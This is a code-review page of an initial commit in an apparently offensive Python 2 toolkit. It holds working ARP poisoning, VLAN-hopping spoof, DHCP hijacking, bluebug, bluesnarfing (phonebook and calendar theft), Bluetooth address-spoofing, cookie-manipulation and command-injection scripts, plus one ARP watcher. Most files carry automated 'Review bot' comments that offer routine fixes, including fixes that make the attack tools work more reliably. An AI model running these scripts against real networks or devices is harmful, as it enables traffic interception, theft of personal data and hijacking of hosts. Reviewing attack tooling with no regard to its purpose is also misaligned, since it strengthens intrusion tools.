author
Bastian Ballmann
committed
init
0 parents  commit 6714cef


63 files changed

+2891
-0
lines changed

arp-poison.py

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
from scapy.all import sniff, sendp, ARP, Ether
5+
6+
7+
if len(sys.argv) < 2:
8+
print sys.argv[0] + " <iface>"
9+
sys.exit(0)
10+
11+
12+
def arp_poison_callback(packet):
13+
# Got ARP request?
14+
if packet[ARP].op == 1:
15+
answer = Ether(dst=packet[ARP].hwsrc) / ARP()
16+
answer[ARP].op = "is-at"
17+
answer[ARP].hwdst = packet[ARP].hwsrc
18+
answer[ARP].psrc = packet[ARP].pdst
19+
answer[ARP].pdst = packet[ARP].psrc
20+
21+
print "Fooling " + packet[ARP].psrc + " that " + \
22+
packet[ARP].pdst + " is me"
23+
24+
sendp(answer, iface=sys.argv[1])
25+
26+
sniff(prn=arp_poison_callback,
27+
filter="arp",
28+
iface=sys.argv[1],
29+
store=0)
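Review bot: The usage check on lines 7-9 exits with status 0 when `<iface>` is missing, so a wrapper script cannot tell the usage error from a normal exit; arp-spoof.py in the same commit exits with 1 for the same case. Change line 9 to `sys.exit(1)`. `arp_poison_callback` has no docstring; `"""sniff() callback: handles ARP requests (op == 1) seen on sys.argv[1]."""` would state its contract.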

arp-spoof-vlan-hop.py

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
#!/usr/bin/python
2+
3+
import time
4+
from scapy.all import sendp, ARP, Ether, Dot1Q
5+
6+
iface = "eth0"
7+
target_ip = '192.168.13.23'
8+
fake_ip = '192.168.13.5'
9+
fake_mac = 'c0:d3:de:ad:be:ef'
10+
our_vlan = 1
11+
target_vlan = 2
12+
13+
packet = Ether() / \
14+
Dot1Q(vlan=our_vlan) / \
15+
Dot1Q(vlan=target_vlan) / \
16+
ARP(hwsrc=fake_mac,
17+
pdst=target_ip,
18+
psrc=fake_ip,
19+
op="is-at")
20+
21+
while True:
22+
sendp(packet, iface=iface)
23+
time.sleep(10)
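Review bot: Lines 6-11 hard-code the interface, addresses and VLAN ids as module-level constants, whereas arp-spoof.py in the same commit reads its inputs from `sys.argv`, and nothing tells the reader these values must be edited before the script is run. At minimum add a header comment above line 6 such as `# Configuration: edit these before running (no command-line parsing).` The send loop on lines 21-23 has no handler for KeyboardInterrupt, so stopping the script with Ctrl-C prints a traceback rather than exiting cleanly.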

arp-spoof.py

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
import time
5+
from scapy.all import sendp, ARP, Ether
6+
7+
if len(sys.argv) < 3:
8+
print sys.argv[0] + ": <target> <spoof_ip>"
9+
sys.exit(1)
10+
11+
iface = "eth0"
12+
target_ip = sys.argv[1]
13+
fake_ip = sys.argv[2]
14+
15+
ethernet = Ether()
16+
arp = ARP(pdst=target_ip,
17+
psrc=fake_ip,
18+
op="is-at")
19+
packet = ethernet / arp
20+
21+
while True:
22+
sendp(packet, iface=iface)
23+
time.sleep(10)
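Review bot: `iface = "eth0"` on line 11 is hard-coded while the other two inputs come from `sys.argv`, and arp-poison.py in the same commit takes the interface as an argument; on a host without eth0 the script only fails at `sendp`, not at startup. Accept it as an optional third argument, e.g. `iface = sys.argv[3] if len(sys.argv) > 3 else "eth0"`, and mention it in the usage line. The usage text on line 8 uses `argv[0] + ": ..."` while arp-poison.py uses a space separator; pick one format for the repository.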

arp-watcher.py

Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
#!/usr/bin/python
2+
3+
from scapy.all import sniff, ARP
4+
from signal import signal, SIGINT
5+
import sys
6+
7+
arp_watcher_db_file = "/var/cache/arp-watcher.db"
8+
ip_mac = {}
9+
10+
# Save ARP table on shutdown
11+
def sig_int_handler(signum, frame):
12+
print "Got SIGINT. Saving ARP database..."
13+
try:
14+
f = open(arp_watcher_db_file, "w")
15+
16+
for (ip, mac) in ip_mac.items():
17+
f.write(ip + " " + mac + "\n")
18+
19+
f.close()
20+
print "Done."
21+
except IOError:
22+
print "Cannot write file " + arp_watcher_db_file
23+
sys.exit(1)
24+
25+
26+
def watch_arp(pkt):
27+
# got is-at pkt (ARP response)
28+
if pkt[ARP].op == 2:
29+
print pkt[ARP].hwsrc + " " + pkt[ARP].psrc
30+
31+
# Device is new. Remember it.
32+
if ip_mac.get(pkt[ARP].psrc) == None:
33+
print "Found new device " + \
34+
pkt[ARP].hwsrc + " " + \
35+
pkt[ARP].psrc
36+
ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
37+
38+
# Device is known but has a different IP
39+
elif ip_mac.get(pkt[ARP].psrc) and \
40+
ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:
41+
print pkt[ARP].hwsrc + \
42+
" has got new ip " + \
43+
pkt[ARP].psrc + \
44+
" (old " + ip_mac[pkt[ARP].psrc] + ")"
45+
ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
46+
47+
48+
signal(SIGINT, sig_int_handler)
49+
50+
if len(sys.argv) < 2:
51+
print sys.argv[0] + " <iface>"
52+
sys.exit(0)
53+
54+
try:
55+
fh = open(arp_watcher_db_file, "r")
56+
except IOError:
57+
print "Cannot read file " + arp_watcher_db_file
58+
sys.exit(1)
59+
60+
for line in fh:
61+
line.chomp()
62+
(ip, mac) = line.split(" ")
63+
ip_mac[ip] = mac
64+
65+
sniff(prn=watch_arp,
66+
filter="arp",
67+
iface=sys.argv[1],
68+
store=0)
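Review bot: `line.chomp()` on line 61 is not a Python str method, so loading an existing database raises AttributeError on the first line, and even if it were the result is discarded; replace lines 61-62 with `ip, mac = line.rstrip("\n").split(" ")`. Without that strip the stored `mac` keeps its trailing newline, so the `!=` comparison on line 40 would flag every known device as changed on each reply. `fh` is never closed; wrapping the load in `with open(arp_watcher_db_file) as fh:` also covers that. `sig_int_handler` prints "Done." but then returns into `sniff`, so Ctrl-C saves the table without stopping the watcher; add `sys.exit(0)` after line 20. In `watch_arp`, the `elif` on lines 39-40 fires when a known IP shows up with a different MAC, but the comment on line 38 and the message on line 42 say the MAC "has got new ip" — reword both to say the IP's MAC changed, which is the event an ARP watcher exists to report.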

bdaddr.py

Lines changed: 41 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,41 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
import struct
5+
import bluetooth._bluetooth as bt
6+
7+
if len(sys.argv) < 2:
8+
print sys.argv[0] + " <bdaddr>"
9+
sys.exit(1)
10+
11+
# Split bluetooth address into it's bytes
12+
baddr = sys.argv[1].split(":")
13+
14+
# Open hci socket
15+
sock = bt.hci_open_dev(0)
16+
17+
# CSR vendor command to change address
18+
cmd = [ "\xc2", "\x02", "\x00", "\x0c", "\x00", "\x11",
19+
"\x47", "\x03", "\x70", "\x00", "\x00", "\x01",
20+
"\x00", "\x04", "\x00", "\x00", "\x00", "\x00",
21+
"\x00", "\x00", "\x00", "\x00", "\x00", "\x00",
22+
"\x00" ]
23+
24+
# Set new addr in hex
25+
cmd[17] = baddr[3].decode("hex")
26+
cmd[19] = baddr[5].decode("hex")
27+
cmd[20] = baddr[4].decode("hex")
28+
cmd[21] = baddr[2].decode("hex")
29+
cmd[23] = baddr[1].decode("hex")
30+
cmd[24] = baddr[0].decode("hex")
31+
32+
# Send HCI request
33+
bt.hci_send_req(sock,
34+
bt.OGF_VENDOR_CMD,
35+
0,
36+
bt.EVT_VENDOR,
37+
2000,
38+
"".join(cmd))
39+
40+
sock.close()
41+
print "Dont forget to reset your device"
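Review bot: `baddr = sys.argv[1].split(":")` on line 12 is used without checking that it yielded six parts, so a malformed address fails later at `baddr[5]` with an IndexError (or a TypeError from `.decode("hex")` on a non-hex octet) instead of a usage message. Add after line 12 `if len(baddr) != 6: print "Invalid bdaddr"; sys.exit(1)` so validation happens before the HCI socket is opened on line 15. If `hci_send_req` raises, `sock.close()` on line 40 is skipped; a `try/finally` around lines 33-40 would close it.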

bluebug.py

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
import lightblue
5+
6+
if len(sys.argv) < 2:
7+
print sys.argv[0] + " <btaddr> <channel>"
8+
sys.exit(0)
9+
10+
btaddr = sys.argv[1]
11+
channel = int(sys.argv[2]) or 17
12+
running = True
13+
14+
sock = lightblue.socket()
15+
sock.connect((sys.argv[1], channel))
16+
17+
while running:
18+
cmd = raw_input(">>> ")
19+
20+
if cmd == "quit" or cmd == "exit":
21+
running = False
22+
else:
23+
sock.send(cmd)
24+
25+
sock.close()
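Review bot: The check on line 6 only requires one argument, but line 11 reads `sys.argv[2]`, so running with just `<btaddr>` raises IndexError instead of printing the usage text that already lists `<channel>`; change line 6 to `if len(sys.argv) < 3:`. The `or 17` on line 11 only triggers when the channel parses as 0, so it is not the default it looks like; if 17 is meant as the default when the argument is omitted, write `channel = int(sys.argv[2]) if len(sys.argv) > 2 else 17` and keep the `< 2` check. `sock.close()` on line 25 is not reached if `connect` or `send` raises; a `try/finally` would fix that. As in arp-poison.py, the usage path exits with 0 rather than 1.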

bluesnarf.py

Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
from os.path import basename
5+
from lightblue.obex import OBEXClient
6+
7+
8+
if len(sys.argv) < 3:
9+
print sys.argv[0] + ": <btaddr> <channel>"
10+
sys.exit(0)
11+
12+
btaddr = sys.argv[1]
13+
channel = int(sys.argv[2])
14+
15+
print "Bluesnarfing %s on channel %d" % (btaddr, channel)
16+
17+
obex = OBEXClient(btaddr, channel)
18+
obex.connect()
19+
20+
fh = file("calendar.vcs", "w+")
21+
obex.get({"name": "telecom/cal.vcs"}, fh)
22+
fh.close()
23+
24+
fh = file("phonebook.vcf", "w+")
25+
obex.get({"name": "telecom/pb.vcf"}, fh)
26+
fh.close()
27+
28+
obex.disconnect()
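Review bot: `basename` imported on line 4 is never used; drop the import. Lines 20-26 open the output files with the Python 2 `file()` builtin in `"w+"` mode and close them by hand; `with open("calendar.vcs", "w") as fh:` reads more clearly and closes the file even if `obex.get` raises, which the current code does not. `obex.disconnect()` on line 28 is likewise skipped on any exception; a `try/finally` around lines 20-28 would guarantee it.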

bluetooth-scanner.py

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
#!/usr/bin/python
2+
3+
import lightblue
4+
5+
for device in lightblue.finddevices():
6+
print device[0] + " " + device[1]

command-injection.py

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
#!/usr/bin/python
2+
3+
###[ Loading modules
4+
5+
import sys
6+
import httplib2
7+
from urlparse import urlparse
8+
from BeautifulSoup import BeautifulSoup
9+
10+
11+
###[ Global vars
12+
13+
max_urls = 999
14+
inject_chars = ["|",
15+
"&&",
16+
";",
17+
'`']
18+
error_msgs = [
19+
"syntax error",
20+
"command not found",
21+
"permission denied",
22+
]
23+
24+
# ...

cookie-manipulator.py

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
import httplib2
5+
6+
if len(sys.argv) < 3:
7+
print sys.argv[0] + ": &lt;url&gt; <key> <value>"
8+
sys.exit(1)
9+
10+
webclient = httplib2.Http()
11+
headers = {'Cookie': sys.argv[2] + '=' + sys.argv[3]}
12+
response, content = webclient.request(sys.argv[1],
13+
'GET',
14+
headers=headers)
15+
print content
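Review bot: The check on line 6 requires only two arguments, but line 11 reads `sys.argv[3]`, so omitting `<value>` raises IndexError rather than printing usage; change line 6 to `if len(sys.argv) < 4:`. The usage string on line 7 contains `&lt;url&gt;` where the other two placeholders use literal angle brackets; if that is really in the file and not an artifact of this page's rendering, it should read `<url>`.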

dhcp-hijack.py

Lines changed: 95 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,95 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
import getopt
5+
import random
6+
import scapy.all as scapy
7+
8+
dev = "eth0"
9+
gateway = None
10+
nameserver = None
11+
dhcpserver = None
12+
client_net = "192.168.1."
13+
filter = "udp port 67"
14+
15+
def handle_packet(packet):
16+
eth = packet.getlayer(scapy.Ether)
17+
ip = packet.getlayer(scapy.IP)
18+
udp = packet.getlayer(scapy.UDP)
19+
bootp = packet.getlayer(scapy.BOOTP)
20+
dhcp = packet.getlayer(scapy.DHCP)
21+
dhcp_message_type = None
22+
23+
if not dhcp:
24+
return False
25+
26+
for opt in dhcp.options:
27+
if opt[0] == "message-type":
28+
dhcp_message_type = opt[1]
29+
30+
# dhcp request
31+
if dhcp_message_type == 3:
32+
client_ip = client_net + str(random.randint(2,254))
33+
34+
dhcp_ack = scapy.Ether(src=eth.dst, dst=eth.src) / \
35+
scapy.IP(src=dhcpserver, dst=client_ip) / \
36+
scapy.UDP(sport=udp.dport,
37+
dport=udp.sport) / \
38+
scapy.BOOTP(op=2,
39+
chaddr=eth.dst,
40+
siaddr=gateway,
41+
yiaddr=client_ip,
42+
xid=bootp.xid) / \
43+
scapy.DHCP(options=[('message-type', 5),
44+
('requested_addr',
45+
client_ip),
46+
('subnet_mask',
47+
'255.255.255.0'),
48+
('router', gateway),
49+
('name_server',
50+
nameserver),
51+
('end')])
52+
53+
print "Send spoofed DHCP ACK to %s" % ip.src
54+
scapy.sendp(dhcp_ack, iface=dev)
55+
56+
57+
def usage():
58+
print sys.argv[0] + """
59+
-d <dns_ip>
60+
-g <gateway_ip>
61+
-i <dev>
62+
-s <dhcp_ip>"""
63+
sys.exit(1)
64+
65+
66+
try:
67+
cmd_opts = "d:g:i:s:"
68+
opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
69+
except getopt.GetoptError:
70+
usage()
71+
72+
for opt in opts:
73+
if opt[0] == "-i":
74+
dev = opt[1]
75+
elif opt[0] == "-g":
76+
gateway = opt[1]
77+
elif opt[0] == "-d":
78+
nameserver = opt[1]
79+
elif opt[0] == "-s":
80+
dhcpserver = opt[1]
81+
else:
82+
usage()
83+
84+
if not gateway:
85+
gateway = scapy.get_if_addr(dev)
86+
87+
if not nameserver:
88+
nameserver = gateway
89+
90+
if not dhcpserver:
91+
dhcpserver = gateway
92+
93+
print "Hijacking DHCP requests on %s" % (dev)
94+
scapy.sniff(iface=dev, filter=filter, prn=handle_packet)
95+
